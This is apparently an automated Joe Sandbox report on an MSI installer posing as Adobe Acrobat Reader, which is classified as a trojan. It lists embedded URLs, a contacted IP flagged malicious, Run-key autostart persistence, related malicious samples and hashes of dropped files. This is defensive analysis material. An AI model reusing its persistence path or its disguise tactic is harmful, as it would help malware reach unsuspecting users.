http://www.indyproject.org/	Adobe Acrobat Pro.exe, 00000003.00000003.1873869776.00000000077E0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2230733260.0000000005ED0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2427076057.000000001801C000.00000020.00000001.01000000.00000004.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2378547349.0000000006080000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000003.2460055582.0000000005FE0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000003.2337696991.0000000006050000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.vso-software.fr/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
https://www.vso-software.fr/vso-partners.php	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.carterandcone.com	Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://vso-software.fr/download.phpU	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007448000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.0000000007451000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/p	Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.baua.de/nn_56926/de/Themen-von-A-Z/Arbeitsstaetten/ASR/pdf/ASR-A1-3.pdfjc	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.typography.net	Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007495000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.000000000742C000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.000000000749F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.0000000007437000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/2	Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vso-software.fr/redirect.php?url=http://oasis.vso-software.fr/Additional%20DVD%20menu%20t	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.jiyu-kobo.co.jp/0	Adobe Acrobat Pro.exe, 00000003.00000003.1746958046.00000000FFD90000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.soft-gems.net	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vso-software.fr/secure/auto_update.phpU	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://fr.vso-software.fr/support.php	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/guides/cxd/how-to-convert-avi-to-dvd.php?adl=1U	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.icon-king.com/projects/nuvola/v=	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.openoffice.org/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.ascendercorp.com/typedesigners.html	Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vso-software.fr/download.php	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.fonts.com	Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007495000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000074AD000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.de	Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000750A000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007518000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vso-software.fr/support.php	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.zhongyicts.com.cn	Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://commons.wikimedia.org/wiki/Crystal_Clear	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://forums.vso-software.fr/advanced-text-customization-in-dvd-menus-	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.fontbureau.com/designers/03	Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007611000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://creativecommons.org/licenses/LGPL/2.1/;	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://creativecommons.org/licenses/GPL/3.0/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.fontbureau.com/designers/03P	Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/p	Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://creativecommons.org/licenses/GPL/2.0/lj	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://svn.vso-software.fr/listing.php?repname=ffmpeg&path=%2Ftrunk%2F#_trunk_	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/secure/license_manager.php?m=hello	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/update/U	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.0000000007550000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743709263.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFC00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007495000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2094547921.00000000FFC30000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.000000000749F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.00000000075D5000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/	Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vso-software.fr/secure/license_manager.php?m=license	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://everaldo.com/crystal/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://jvcl.delphi-jedi.org/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://vso-software.fr/products.phpU	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/support.phpU	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.gimp.org/S	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.lifeboat.jp/products/ctv1/ctv1_buy.html	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false		high
http://creativecommons.org/licenses/LGPL/2.1/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.sandoll.co.krp	Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vso-software.fr/redirect.php?site=converters_need_decryptor	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/shop.php	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.oxygen-icons.org/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nuovext.pwsp.net	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.soft-gems.net/supplement/download.php?ID=28	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://creativecommons.org/licenses/by-sa/3.0/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://en.wikiped	Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000074AD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.000000000750A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vso-software.fr/products/	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.founder.com.cn/cn/	Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://fontawesome.io/license/	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.fontbureau.com/designers03P	Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.00000000075D5000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.vso-software.fr/products.php	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/secure/rlist.php?f=get	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://secure.vso-software.fr/?m=tsU	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
https://www.vso-software.fr/secure/lm/rsi.php	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.html	Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers03	Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Adobe Acrobat Pro.exe, 00000003.00000003.1746958046.00000000FFD90000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1747427333.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000074E0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.00000000074E0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comp	Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://packages.debian.org/lenny/app-install-data	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.ffmpeg.org	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false		high
http://rg.vso-software.fr	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/secure/fast_check.php	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.fontbureau.com/designers/	Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.228.72.212	unknown	Spain		197518	RACKMARKTES	true

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1357123
Start date and time:	2023-12-10 03:10:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Adobe_Acrobate_Reader_Pro-HAv70.msi
Detection:	MAL
Classification:	mal96.troj.evad.winMSI@8/27@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 75% Number of executed functions: 9 Number of non-executed functions: 197
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:11:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Adobe Acrobat Pro.exe C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
02:11:46	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Adobe Acrobat Pro.exe C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RACKMARKTES	Word_comprob_33690014194.HTA	Get hash	malicious	Unknown	Browse	185.228.72.84
	ReF_comprobante_85523364312723157089271.HTA.hta	Get hash	malicious	Unknown	Browse	185.228.72.84
	OaJjqAJFcN.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	193.58.147.147
	http://anaryal.homes/fZmyIvHu.png	Get hash	malicious	Unknown	Browse	45.147.251.143
	pfA7Bnn7Fd.elf	Get hash	malicious	Mirai	Browse	185.214.111.84
	https://infoonline-clientebnlparibas-officeontheweb.dtsuperficies.com/	Get hash	malicious	Unknown	Browse	45.147.250.156
	x86.elf	Get hash	malicious	Mirai	Browse	185.214.108.245
	https://bestplaceforall.com	Get hash	malicious	Unknown	Browse	130.193.108.231
	p6RYIKv8vm.exe	Get hash	malicious	DanaBot	Browse	45.131.134.4
	d3Kc55Uhwn	Get hash	malicious	Mirai	Browse	185.214.108.246
	I9gFWKm2Em	Get hash	malicious	Mirai	Browse	185.214.108.247
	zd9Gd8UT5s	Get hash	malicious	Mirai	Browse	185.214.108.231
	0tJClm2RJX	Get hash	malicious	Unknown	Browse	188.95.253.125

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSIDD98.tmp	6309e1.msi	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
C:\Windows\Installer\MSIDE35.tmp	6309e1.msi	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
C:\Windows\Installer\MSIDE94.tmp	6309e1.msi	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\64d7be.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	2922
Entropy (8bit):	5.529147558975744
Encrypted:	false
SSDEEP:	48:afRAXqSyrApARfMUrLlxXNlNHNVHo+zASAlTZASASABrASASABmfASASABrAX6kk:af2x7AFMAxRNlZjHj+5i6+2uBEFBf7
MD5:	76603E3C31F48E118CA66B3FFD58F672
SHA1:	8C0025F3D947128E519C64C71534D87874712C72
SHA-256:	F2B0F706027D73E7DB5F13AE694480E243F20F7AB1171358E6E47B52FCBA0F04
SHA-512:	5F866546B5C6C98195C98BA56B8B3266BD18AE0DB11BA9715177CE3F2C73C5CD205FE8965E84CD1A76C6234A1557531790612F4A9997BA620A9DDB7BDA81689B
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@c..W.@.....@.....@.....@.....@.....@......&.{C9BC840A-0E96-4595-AE16-15CAE1E4F236}..Adobe Acrobat Reader#.Adobe_Acrobate_Reader_Pro-HAv70.msi.@.....@...-.@.....@........&.{D69B9218-2190-4716-88FD-CE4B13CFF25A}.....@.....@.....@.....@.......@.....@.....@.......@......Adobe Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{8AFCC14C-3554-4651-AE72-183FABA0C934}&.{C9BC840A-0E96-4595-AE16-15CAE1E4F236}.@......&.{3FDBF9E2-D3D7-4369-9307-69499656012E}&.{C9BC840A-0E96-4595-AE16-15CAE1E4F236}.@......&.{2E9A95CE-09EE-4D5B-AB2B-D3355D78ABE9}&.{C9BC840A-0E96-4595-AE16-15CAE1E4F236}.@......&.{606954D4-FF0B-40EF-92B9-59CC43B6AFB0}&.{C9BC840A-0E96-4595-AE16-15CAE1E4F236}.@......&.{C3E41ABF-4B2A-4F78-8790-08DC6C8037C1}&.{C9BC840A-0E96-4595-AE16-15CAE1E4F236}.@......&.{F3981557-83D6-486A-B5E3-73265F5A156E}&.{C9BC840A-0E96-4595-AE16-15CAE1E4F23

C:\ProgramData\Vso\font.cache

Download File

Process:	C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
File Type:	data
Category:	dropped
Size (bytes):	315573
Entropy (8bit):	7.980766395291537
Encrypted:	false
SSDEEP:	6144:p2S5xEv4avgmu1iZ6BuCUav36WIEobArCCNvCWQ07YjSOgm:SHvg1VBuC8ExrxNL8jDgm
MD5:	B989F7220B700C36A27F78965450553C
SHA1:	7A909C8A8850330D81AEE65DD929AA29BDCF4668
SHA-256:	5DFDE9B570DA51EBA034D176D8A6552FE9AFA1DC913D298A2C9093D4E68734BA
SHA-512:	E8A961A8E30CEFB3976ECDD95DC229AC417707538DBA709E332225D9B62CCE8A83D950A00B34AC25C8990E98048DEBF6A12D918B2D64D22026B7826475355CF1
Malicious:	false
Reputation:	low
